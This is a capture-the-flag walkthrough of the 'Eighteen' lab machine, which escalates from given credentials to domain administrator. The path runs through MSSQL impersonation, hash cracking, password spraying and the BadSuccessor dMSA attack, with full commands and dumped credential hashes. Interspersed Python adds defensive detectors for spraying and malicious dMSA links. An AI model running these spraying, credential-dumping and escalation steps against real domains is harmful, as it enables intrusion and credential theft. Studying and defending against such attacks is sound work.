
Reconnaissance
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://eighteen.htb/
|_http-server-header: Microsoft-IIS/10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
|_ssl-date: 2025-11-16T17:04:08+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.68.228:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.68.228:1433:
| Target_Name: EIGHTEEN
| NetBIOS_Domain_Name: EIGHTEEN
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: eighteen.htb
| DNS_Computer_Name: DC01.eighteen.htb
| DNS_Tree_Name: eighteen.htb
|_ Product_Version: 10.0.26100
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-11-16T15:42:09
|_Not valid after: 2055-11-16T15:42:09
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
The hostname DC01 suggests I'm dealing with the Domain Controller for the eighteen.htb domain, so I add both names to my /etc/hosts file. Even though it is most likely a DC, the usual DC ports are not exposed; only HTTP, MSSQL and WinRM are reachable.
Initial Access
As is common in real-life Windows penetration tests, you will start the Eighteen box with credentials for the following account:
kevin:iNa2we6haRj2gaw!
The page on eighteen.htb is about tracking expenses and income, but the provided credentials do not work there. Although I could register a new account, I first try the other protocols.

WinRM also reports an authentication failure for kevin, so I try MSSQL next. This time the credentials work and I get a session with mssqlclient. Enumerating the available databases lists financial_planner as the only non-default one; it likely holds the data for the application on port 80. Accessing that database as kevin is not possible.
$ impacket-mssqlclient kevin:'iNa2we6haRj2gaw!'@dc01.eighteen.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
SQL (kevin guest@master)> enum_db
name is_trustworthy_on
----------------- -----------------
master 0
tempdb 0
model 0
msdb 1
financial_planner 0
SQL (kevin guest@master)> use financial_planner
ERROR(DC01): Line 1: The server principal "kevin" is not able to access the database "financial_planner" under the current security context.
Checking whether kevin can impersonate any other login returns a single result, for appdev. As soon as I switch to that context, I can access the financial_planner database and list its tables.
SQL (kevin guest@master)> enum_impersonate
execute as database permission_name state_desc grantee grantor
---------- -------- --------------- ---------- ------- -------
b'LOGIN' b'' IMPERSONATE GRANT kevin appdev
SQL (kevin guest@master)> exec_as_login appdev
SQL (appdev appdev@master)> use financial_planner
ENVCHANGE(DATABASE): Old Value: master, New Value: financial_planner
INFO(DC01): Line 1: Changed database context to 'financial_planner'.
SQL (appdev appdev@financial_planner)> SELECT name FROM sys.tables WHERE type = 'u';
name
-----------
users
incomes
expenses
allocations
analytics
visits
Obviously the users table is the most interesting one, since it might hold credentials. There is only a single user, admin, together with its password hash.
SQL (appdev appdev@financial_planner)> SELECT * FROM users;
id full_name username email password_hash is_admin created_at
---- --------- -------- ------------------ ------------------------------------------------------------------------------------------------------ -------- ----------
1002 admin admin admin@eighteen.htb pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133 1 2025-10-29 05:39:03
In order to crack this hash with hashcat it has to be converted into the format of mode 10900, which expects sha256:<iterations>:<salt>:<hash> with salt and hash base64-encoded [1]. The hash part is easily decoded from hex and re-encoded as base64 with bash. The tricky part is that the salt has to be base64-encoded as well: it looks like base64 because it only consists of characters from the base64 alphabet, but it is actually a plain ASCII string.
$ echo -n '0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133' | xxd -r -p | base64 -w0
BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=
$ echo -n 'AMtzteQIG7yAbZIa' | base64 -w0
QU10enRlUUlHN3lBYlpJYQ==
$ hashcat -m 10900 \
'sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=' \
/usr/share/wordlists/rockyou.txt
--- SNIP ---
sha256:600000:QU10enRlUUlHN3lBYlpJYQ==:BnOtkKC0r7GdZiM28Pzjqe3Qt7GRk3F74ozk1myIcTM=:iloveyou1
hashcat takes a bit longer than usual but eventually prints iloveyou1 as the cracked password. It lets me log in to the web interface, but even as admin there is nothing else of interest.
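The conversion above, including the salt pitfall, as a small Python script. This is an added example and not part of the original write-up: it parses the Werkzeug-style pbkdf2:sha256:<iterations>$<salt>$<hexdigest> value from the users table, emits the hashcat mode 10900 line, and recomputes PBKDF2 for one candidate the way the application itself does on login. The stored hash and the password are the ones shown above; the function names are my own.

```python
"""Werkzeug PBKDF2 hash -> hashcat mode 10900, plus an offline verifier.

Added example, not code from the write-up. STORED_HASH is the value from the
users table shown on the page; everything else is this script's own naming.
"""
import base64
import hashlib
import hmac
import re

# Stored value from the users table (Werkzeug format:
# pbkdf2:<hash_name>:<iterations>$<salt>$<hex_digest>).
STORED_HASH = (
    "pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$"
    "0673ad90a0b4afb19d662336f0fce3a9edd0b7b19193717be28ce4d66c887133"
)

_WERKZEUG_RE = re.compile(
    r"^pbkdf2:(?P<alg>[a-z0-9]+):(?P<iter>\d+)\$(?P<salt>[^$]+)\$(?P<digest>[0-9a-f]+)$"
)


def parse_werkzeug_pbkdf2(stored: str) -> dict:
    """Split a Werkzeug pbkdf2 hash into algorithm, iterations, salt and digest.

    Werkzeug feeds the salt to PBKDF2 as the raw ASCII bytes of the string
    between the two '$' signs; the digest is hex-encoded.
    """
    m = _WERKZEUG_RE.match(stored)
    if not m:
        raise ValueError("not a Werkzeug pbkdf2 hash")
    return {
        "alg": m["alg"],
        "iterations": int(m["iter"]),
        "salt": m["salt"].encode("ascii"),
        "digest": bytes.fromhex(m["digest"]),
    }


def to_hashcat_10900(stored: str) -> str:
    """Re-encode as sha256:<iterations>:<b64 salt>:<b64 digest> (hashcat -m 10900).

    The salt must be base64-encoded even though it already looks like base64:
    it is plain ASCII, and passing it through unchanged would make hashcat
    decode it into different salt bytes, so the hash would never crack.
    """
    parts = parse_werkzeug_pbkdf2(stored)
    if parts["alg"] != "sha256":
        raise ValueError("mode 10900 is PBKDF2-HMAC-SHA256 only")
    return "sha256:{}:{}:{}".format(
        parts["iterations"],
        base64.b64encode(parts["salt"]).decode(),
        base64.b64encode(parts["digest"]).decode(),
    )


def verify_password(stored: str, candidate: str) -> bool:
    """Recompute PBKDF2 for one candidate and compare in constant time.

    This mirrors what the application does on login and doubles as a check
    that the converted hashcat line refers to the same salt/iterations/digest.
    """
    parts = parse_werkzeug_pbkdf2(stored)
    derived = hashlib.pbkdf2_hmac(
        parts["alg"],
        candidate.encode("utf-8"),
        parts["salt"],
        parts["iterations"],
        dklen=len(parts["digest"]),
    )
    return hmac.compare_digest(derived, parts["digest"])


if __name__ == "__main__":
    print(to_hashcat_10900(STORED_HASH))
    print(verify_password(STORED_HASH, "iloveyou1"))
```

Running it prints the same mode-10900 line that is passed to hashcat above. On the defensive side the same parser lets an application owner check stored hashes against a breach list in-process and flag accounts that still use a known-weak password, without exporting the hashes anywhere.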
I then use nxc to brute-force valid users and groups through MSSQL with --rid-brute and add all the identified users to a text file called users.txt.
$ nxc mssql dc01.eighteen.htb -u kevin \
-p 'iNa2we6haRj2gaw!' \
--local-auth \
--rid-brute
MSSQL 10.129.68.228 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
MSSQL 10.129.68.228 1433 DC01 [+] DC01\kevin:iNa2we6haRj2gaw!
MSSQL 10.129.68.228 1433 DC01 498: EIGHTEEN\Enterprise Read-only Domain Controllers
MSSQL 10.129.68.228 1433 DC01 500: EIGHTEEN\Administrator
MSSQL 10.129.68.228 1433 DC01 501: EIGHTEEN\Guest
MSSQL 10.129.68.228 1433 DC01 502: EIGHTEEN\krbtgt
MSSQL 10.129.68.228 1433 DC01 512: EIGHTEEN\Domain Admins
MSSQL 10.129.68.228 1433 DC01 513: EIGHTEEN\Domain Users
MSSQL 10.129.68.228 1433 DC01 514: EIGHTEEN\Domain Guests
MSSQL 10.129.68.228 1433 DC01 515: EIGHTEEN\Domain Computers
MSSQL 10.129.68.228 1433 DC01 516: EIGHTEEN\Domain Controllers
MSSQL 10.129.68.228 1433 DC01 517: EIGHTEEN\Cert Publishers
MSSQL 10.129.68.228 1433 DC01 518: EIGHTEEN\Schema Admins
MSSQL 10.129.68.228 1433 DC01 519: EIGHTEEN\Enterprise Admins
MSSQL 10.129.68.228 1433 DC01 520: EIGHTEEN\Group Policy Creator Owners
MSSQL 10.129.68.228 1433 DC01 521: EIGHTEEN\Read-only Domain Controllers
MSSQL 10.129.68.228 1433 DC01 522: EIGHTEEN\Cloneable Domain Controllers
MSSQL 10.129.68.228 1433 DC01 525: EIGHTEEN\Protected Users
MSSQL 10.129.68.228 1433 DC01 526: EIGHTEEN\Key Admins
MSSQL 10.129.68.228 1433 DC01 527: EIGHTEEN\Enterprise Key Admins
MSSQL 10.129.68.228 1433 DC01 528: EIGHTEEN\Forest Trust Accounts
MSSQL 10.129.68.228 1433 DC01 529: EIGHTEEN\External Trust Accounts
MSSQL 10.129.68.228 1433 DC01 553: EIGHTEEN\RAS and IAS Servers
MSSQL 10.129.68.228 1433 DC01 571: EIGHTEEN\Allowed RODC Password Replication Group
MSSQL 10.129.68.228 1433 DC01 572: EIGHTEEN\Denied RODC Password Replication Group
MSSQL 10.129.68.228 1433 DC01 1000: EIGHTEEN\DC01$
MSSQL 10.129.68.228 1433 DC01 1101: EIGHTEEN\DnsAdmins
MSSQL 10.129.68.228 1433 DC01 1102: EIGHTEEN\DnsUpdateProxy
MSSQL 10.129.68.228 1433 DC01 1601: EIGHTEEN\mssqlsvc
MSSQL 10.129.68.228 1433 DC01 1602: EIGHTEEN\SQLServer2005SQLBrowserUser$DC01
MSSQL 10.129.68.228 1433 DC01 1603: EIGHTEEN\HR
MSSQL 10.129.68.228 1433 DC01 1604: EIGHTEEN\IT
MSSQL 10.129.68.228 1433 DC01 1605: EIGHTEEN\Finance
MSSQL 10.129.68.228 1433 DC01 1606: EIGHTEEN\jamie.dunn
MSSQL 10.129.68.228 1433 DC01 1607: EIGHTEEN\jane.smith
MSSQL 10.129.68.228 1433 DC01 1608: EIGHTEEN\alice.jones
MSSQL 10.129.68.228 1433 DC01 1609: EIGHTEEN\adam.scott
MSSQL 10.129.68.228 1433 DC01 1610: EIGHTEEN\bob.brown
MSSQL 10.129.68.228 1433 DC01 1611: EIGHTEEN\carol.white
MSSQL 10.129.68.228 1433 DC01 1612: EIGHTEEN\dave.green
$ cat users.txt
Administrator
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green
With password spraying I quickly find a valid combination and log in via WinRM with the credentials adam.scott:iloveyou1 to collect the first flag.
$ nxc winrm dc01.eighteen.htb -u users.txt \
-p 'iloveyou1' \
--continue-on-success
WINRM 10.129.68.228 5985 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:eighteen.htb)
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\jamie.dunn:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\jane.smith:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\alice.jones:iloveyou1
WINRM 10.129.68.228 5985 DC01 [+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\bob.brown:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\carol.white:iloveyou1
WINRM 10.129.68.228 5985 DC01 [-] eighteen.htb\dave.green:iloveyou1
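From the defender's side, the spray above leaves a distinctive trace on the DC: one source address, many different target accounts, one failed logon each, all within seconds, followed by a success for the account that worked. The following Python is an added example (not from the write-up) that flags that pattern in a list of Security-log style events. The events are constructed to mirror the spray shown, the field names follow Windows events 4625/4624, and the thresholds and helper names are my own.

```python
"""Password-spray detection over logon events (added example, not from the page).

Spraying differs from brute force: few attempts per account, many accounts per
source. So the logic keys on the source IP and counts distinct target users
among its 4625s inside a sliding window, then reports any 4624 from the same
source in that window as a probable hit.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (UTC). LogonType 3 = network logon, which is what
# WinRM/NTLM authentication looks like on the DC. Times and IPs are invented.
SAMPLE_EVENTS = [
    {"time": "2025-11-16T17:20:01", "EventID": 4625, "TargetUserName": "jamie.dunn",  "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    {"time": "2025-11-16T17:20:01", "EventID": 4625, "TargetUserName": "jane.smith",  "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    {"time": "2025-11-16T17:20:02", "EventID": 4625, "TargetUserName": "alice.jones", "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    {"time": "2025-11-16T17:20:02", "EventID": 4624, "TargetUserName": "adam.scott",  "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0x0"},
    {"time": "2025-11-16T17:20:03", "EventID": 4625, "TargetUserName": "bob.brown",   "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    {"time": "2025-11-16T17:20:03", "EventID": 4625, "TargetUserName": "carol.white", "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    {"time": "2025-11-16T17:20:04", "EventID": 4625, "TargetUserName": "dave.green",  "IpAddress": "10.10.14.5", "LogonType": 3, "Status": "0xC000006D"},
    # Benign noise: one user mistyping their own password twice from the office.
    {"time": "2025-11-16T17:25:10", "EventID": 4625, "TargetUserName": "jane.smith",  "IpAddress": "10.129.1.50", "LogonType": 2, "Status": "0xC000006A"},
    {"time": "2025-11-16T17:25:20", "EventID": 4625, "TargetUserName": "jane.smith",  "IpAddress": "10.129.1.50", "LogonType": 2, "Status": "0xC000006A"},
    {"time": "2025-11-16T17:25:31", "EventID": 4624, "TargetUserName": "jane.smith",  "IpAddress": "10.129.1.50", "LogonType": 2, "Status": "0x0"},
]


def detect_spray(events, window=timedelta(minutes=5), min_distinct_users=5):
    """Return one alert per source IP that failed logons for many distinct users in a window.

    Each alert carries the window bounds, the sprayed accounts and any accounts
    that logged on successfully from that source inside the same window.
    """
    failures = defaultdict(list)   # ip -> [(time, user)]
    successes = defaultdict(list)  # ip -> [(time, user)]
    for ev in events:
        t = datetime.fromisoformat(ev["time"])
        if ev["EventID"] == 4625:
            failures[ev["IpAddress"]].append((t, ev["TargetUserName"]))
        elif ev["EventID"] == 4624:
            successes[ev["IpAddress"]].append((t, ev["TargetUserName"]))

    alerts = []
    for ip, fails in failures.items():
        fails.sort()
        # Slide a window over this source's failures and keep the window with
        # the most distinct target accounts.
        best_users, lo, hi = set(), None, None
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) > len(best_users):
                best_users, lo, hi = users, fails[start][0], fails[end][0]
        if len(best_users) >= min_distinct_users:
            hits = sorted({u for t, u in successes.get(ip, []) if lo <= t <= hi})
            alerts.append({
                "source": ip,
                "window_start": lo.isoformat(),
                "window_end": hi.isoformat(),
                "failed_users": sorted(best_users),
                "succeeded_users": hits,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_EVENTS):
        print(alert)
```

The office user who fails twice never trips the rule because the count is of distinct accounts per source, not attempts per account; that is the property that separates a spray from ordinary typos and from single-account brute force, and it is why per-account lockout alone does not stop the technique.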
Privilege Escalation
The Domain Controller runs a fairly new version of Windows Server. Server 2025 introduced a new feature called Delegated Managed Service Accounts (DMSA) [2], which can be abused in an attack dubbed BadSuccessor [3].
PS > Get-ComputerInfo
WindowsBuildLabEx : 26100.1.amd64fre.ge_release.240331-1435
WindowsCurrentVersion : 6.3
WindowsEditionId : ServerDatacenter
WindowsInstallationType : Server Core
WindowsInstallDateFromRegistry : 3/24/2025 3:38:13 AM
WindowsProductId : 00491-60000-17651-AA131
WindowsProductName : Windows Server 2025 Datacenter
WindowsRegisteredOrganization :
WindowsRegisteredOwner :
WindowsSystemRoot : C:\WINDOWS
WindowsVersion : 2009
OSDisplayVersion : 24H2
--- SNIP ---
There are several proof-of-concepts available, such as SharpSuccessor or BadSuccessor. I decide to use the latter since it has a compiled version available in the repository. After uploading the binary to the target, I run it with the find sub-command to search for vulnerable OUs in which the current user can create child objects. This finds OU=Staff, and I can use escalate to create a new DMSA that is linked to the Administrator account.
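A defender can look for the same attribute changes the escalate step makes. The Python below is an added example, not code from the write-up or from the BadSuccessor project: it audits dMSA objects for a completed migration link to a privileged account, for password retrievers outside an allow-list, and for placement outside the default container. The objects are constructed (the first mirrors the one created on this box); the privileged-DN set, the retriever allow-list and the container check are assumptions, and in a real directory msDS-GroupMSAMembership is a security descriptor that has to be resolved to principal names before this check runs.

```python
"""Audit dMSA objects for BadSuccessor-style links (added example, not from the page).

Input is a list of directory objects with the attributes the attack sets:
msDS-ManagedAccountPrecededByLink, msDS-DelegatedMSAState and
msDS-GroupMSAMembership. In practice these come from an LDAP export; here
they are constructed inline.
"""

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
# Default container for (d)MSAs; a dMSA elsewhere deserves a second look. Assumed.
MSA_CONTAINER = "CN=Managed Service Accounts,"

# Accounts whose privileges a dMSA must never inherit. Assumed list.
PRIVILEGED_DNS = {
    "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
    "CN=krbtgt,CN=Users,DC=eighteen,DC=htb",
}
# Principals allowed to retrieve a dMSA password during a sanctioned migration
# (normally the computer accounts of the hosts being migrated). Assumed.
EXPECTED_RETRIEVERS = {"DC01$"}

# Constructed objects: the first mirrors the dMSA created on the page, the
# second is a fresh dMSA with no predecessor, the third is a sanctioned
# migration of an ordinary service account, the fourth is not a dMSA at all.
SAMPLE_OBJECTS = [
    {"dn": "CN=ryuki_dmsa,OU=Staff,DC=eighteen,DC=htb",
     "objectClass": ["top", DMSA_CLASS],
     "msDS-ManagedAccountPrecededByLink": "CN=Administrator,CN=Users,DC=eighteen,DC=htb",
     "msDS-DelegatedMSAState": 2,
     "msDS-GroupMSAMembership": ["adam.scott"]},
    {"dn": "CN=web_dmsa,CN=Managed Service Accounts,DC=eighteen,DC=htb",
     "objectClass": ["top", DMSA_CLASS],
     "msDS-DelegatedMSAState": 0,
     "msDS-GroupMSAMembership": ["DC01$"]},
    {"dn": "CN=sql_dmsa,CN=Managed Service Accounts,DC=eighteen,DC=htb",
     "objectClass": ["top", DMSA_CLASS],
     "msDS-ManagedAccountPrecededByLink": "CN=mssqlsvc,CN=Users,DC=eighteen,DC=htb",
     "msDS-DelegatedMSAState": 2,
     "msDS-GroupMSAMembership": ["DC01$"]},
    {"dn": "CN=adam.scott,OU=Staff,DC=eighteen,DC=htb", "objectClass": ["top", "user"]},
]


def audit_dmsas(objects, privileged=PRIVILEGED_DNS, expected_retrievers=EXPECTED_RETRIEVERS):
    """Return findings for dMSAs whose link, retrievers or location look suspicious.

    Per dMSA:
      - msDS-DelegatedMSAState == 2 (the value the escalate step sets, marking
        the migration completed) with a predecessor in the privileged set is
        critical: tickets for the dMSA carry the predecessor's privileges.
      - msDS-GroupMSAMembership containing principals outside the allow-list
        means someone other than the migrating hosts can fetch the password.
      - a dMSA outside the Managed Service Accounts container is how the attack
        sidesteps the admin-only default location.
    """
    findings = []
    for obj in objects:
        if DMSA_CLASS not in obj.get("objectClass", []):
            continue
        reasons = []
        link = obj.get("msDS-ManagedAccountPrecededByLink")
        state = obj.get("msDS-DelegatedMSAState", 0)
        privileged_link = bool(link) and state == 2 and link in privileged
        if privileged_link:
            reasons.append(f"completed migration from privileged account {link}")
        unexpected = sorted(set(obj.get("msDS-GroupMSAMembership", [])) - set(expected_retrievers))
        if unexpected:
            reasons.append("password retrievable by " + ", ".join(unexpected))
        if MSA_CONTAINER not in obj["dn"]:
            reasons.append("created outside the Managed Service Accounts container")
        if reasons:
            findings.append({
                "dn": obj["dn"],
                "severity": "critical" if privileged_link else "warning",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_dmsas(SAMPLE_OBJECTS):
        print(finding["severity"].upper(), finding["dn"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

Only the object that mirrors the attack is reported, and it trips all three checks. The preventive counterpart is to review who holds CreateChild (or GenericAll/GenericWrite) on OUs, since that permission on any OU is what the find step looks for.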
PS > .\BadSuccessor.exe find
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] OUs you have write access to:
-> OU=Domain Controllers,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll
-> OU=Staff,DC=eighteen,DC=htb
Privileges: GenericWrite, GenericAll, CreateChild
PS > .\BadSuccessor escalate `
-targetOU "OU=Staff,DC=eighteen,DC=htb" `
-dmsa ryuki_dmsa `
-targetUser "CN=Administrator,CN=Users,DC=eighteen,DC=htb" `
-dnshostname ryuki_dmsa `
-user adam.scott `
-dc-ip 127.0.0.1
______ __ _______
| __ \ .---.-.--| | __|.--.--.----.----.-----.-----.-----.-----.----.
| __ < | _ | _ |__ || | | __| __| -__|__ --|__ --| _ | _|
|______/ |___._|_____|_______||_____|____|_____|_____|_____|_____|_____|__|
Researcher: @YuG0rd
Author: @kreepsec
[*] Creating dMSA object...
[*] Inheriting target user privileges
-> msDS-ManagedAccountPrecededByLink = CN=Administrator,CN=Users,DC=eighteen,DC=htb
-> msDS-DelegatedMSAState = 2
[+] Privileges Obtained.
[*] Setting PrincipalsAllowedToRetrieveManagedPassword
-> msDS-GroupMSAMembership = adam.scott
[+] Setting userAccountControl attribute
[+] Setting msDS-SupportedEncryptionTypes attribute
[+] Created dMSA 'ryuki_dmsa' in 'OU=Staff,DC=eighteen,DC=htb', linked to 'CN=Administrator,CN=Users,DC=eighteen,DC=htb' (DC: 127.0.0.1)
--- SNIP ---
With impacket
In v0.13.0 the impacket suite was updated to include code for interacting with DMSAs [4]. Before using it I upload chisel to the DC and create a SOCKS proxy so that I can reach the machine from my attack box. Then I use getST to impersonate ryuki_dmsa$ and dump the service ticket to disk. After exporting the ccache path as KRB5CCNAME I can use secretsdump to get all the hashes of the domain, or use the ticket with psexec/wmiexec for an interactive session.
$ proxychains -q faketime -f +7h getST.py 'EIGHTEEN.HTB/adam.scott'@dc01.eighteen.htb \
-impersonate 'ryuki_dmsa$' \
-self \
-dmsa
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating ryuki_dmsa$
[*] Requesting S4U2self
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:352e1beecc46f6862a8fd388a8e60cd2dd6ca805e4d464cdcbf6f5cb486d4844
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:e4effb56cd9dc560f24ddafd91dd3b6f
[*] EncryptionTypes.rc4_hmac:02c3aa1ffe07dfe71f91b3222679ef57
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:0b133be956bfaddf9cea56701affddec
[*] Saving ticket in ryuki_dmsa$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
$ export KRB5CCNAME=ryuki_dmsa\$@krbtgt_EIGHTEEN.HTB@EIGHTEEN.HTB.ccache
$ proxychains -q faketime -f +7h impacket-secretsdump -no-pass -k dc01.eighteen.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8a6c03715ce8a8d26720e83ffe01c780
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
EIGHTEEN\DC01$:plain_password_hex:--- SNIP ---
EIGHTEEN\DC01$:aad3b435b51404eeaad3b435b51404ee:d79b6837ac78c51c79aab3d970875584:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x48249fb0f4cf23ecbef54affc2b21d65717bf7df
dpapi_userkey:0xb8820f0412fc851cca8aa426248e7f37af5dd0b2
[*] NL$KM
0000 FA 36 C7 D5 C0 82 AB B5 78 E1 17 F0 5E 36 13 5B .6......x...^6.[
0010 A5 9F C0 9C 38 A8 C4 34 FE 20 F7 2B D9 A2 8C AF ....8..4. .+....
0020 71 F2 E0 D2 09 A1 EC 09 EB DE 9B 8C F5 4A E6 2D q............J.-
0030 6B 1D 32 16 A2 ED B4 AE F1 51 AE 5B 41 E5 4E B6 k.2......Q.[A.N.
NL$KM:fa36c7d5c082abb578e117f05e36135ba59fc09c38a8c434fe20f72bd9a28caf71f2e0d209a1ec09ebde9b8cf54ae62d6b1d3216a2edb4aef151ae5b41e54eb6
[*] _SC_MSSQLSERVER
EIGHTEEN\mssqlsvc:zOq3u4AKw5]e
[*] _SC_SQLSERVERAGENT
EIGHTEEN\mssqlsvc:!JpC319216bama
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0b133be956bfaddf9cea56701affddec:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a7c7a912503b16d8402008c1aebdb649:::
With Rubeus
Exploiting this with Rubeus is almost as straightforward as with getST. I start by requesting a new TGT for adam.scott and pass it via the /ticket parameter into the asktgs call together with the /dmsa switch. This requires a recent version of the tool [5].
PS > .\Rubeus.exe asktgt /user:adam.scott `
/password:iloveyou1 `
/enctype:aes256 `
/opsec `
/nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Got domain: eighteen.htb
[*] Using domain controller: DC01.eighteen.htb (fe80::6c4:2289:827f:5867%3)
[!] Pre-Authentication required!
[!] AES256 Salt: EIGHTEEN.HTBadam.scott
[!] AES128 Salt: EIGHTEEN.HTBadam.scott
[!] Etype 23 Salt: <not provided>
[*] Using salt: EIGHTEEN.HTBadam.scott
[*] Using aes256_cts_hmac_sha1 hash: 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
[*] Building AS-REQ (w/ preauth) for: 'eighteen.htb\adam.scott'
[*] Using domain controller: fe80::6c4:2289:827f:5867%3:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
--- SNIP ---
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : adam.scott (NT_PRINCIPAL)
UserRealm : EIGHTEEN.HTB
StartTime : 11/16/2025 11:33:10 AM
EndTime : 11/16/2025 9:33:10 PM
RenewTill : 11/23/2025 11:33:10 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : q0hvZ1uxkHWAwri+JklHvn7cfCG/S0UnsBRMerHssqk=
ASREP (key) : 02F93F7E9E128C32449E2F20475AFCDFB6CC2B4444AC8FD0B02406AF018F75E5
PS > .\Rubeus.exe asktgs /targetuser:ryuki_dmsa$ `
/service:krbtgt/eighteen.htb `
/dmsa `
/opsec `
/nowrap `
/ptt `
/ticket:<BASE64 TICKET>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building DMSA TGS-REQ request for 'ryuki_dmsa$' from 'adam.scott'
[+] Sequence number is: 402612550
[*] Using domain controller: DC01.eighteen.htb (fe80::6c4:2289:827f:5867%3)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
--- SNIP ---
ServiceName : krbtgt/EIGHTEEN.HTB
ServiceRealm : EIGHTEEN.HTB
UserName : ryuki_dmsa$ (NT_PRINCIPAL)
UserRealm : eighteen.htb
StartTime : 11/16/2025 11:33:32 AM
EndTime : 11/16/2025 11:48:32 AM
RenewTill : 11/23/2025 11:33:10 AM
Flags : name_canonicalize, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : ph+ChBLNJJLQ32nrhlufrOABlMAMjQIaCv9N/ziEeyE=
Current Keys for ryuki_dmsa$: (aes256_cts_hmac_sha1) 0EFF7495E8D992C6C152B3F4ED3F3DC77CDED3F01E33D81019C568F3DA380C1E
Since pass-the-ticket only works over the network, I have to convert the ticket from (base64-encoded) kirbi to ccache format to use it with the impacket suite. This gives me an interactive session with high privileges.
$ echo -n '<BASE64>' | base64 -d > dmsa.kirbi
$ impacket-ticketConverter dmsa.kirbi dmsa.ccache
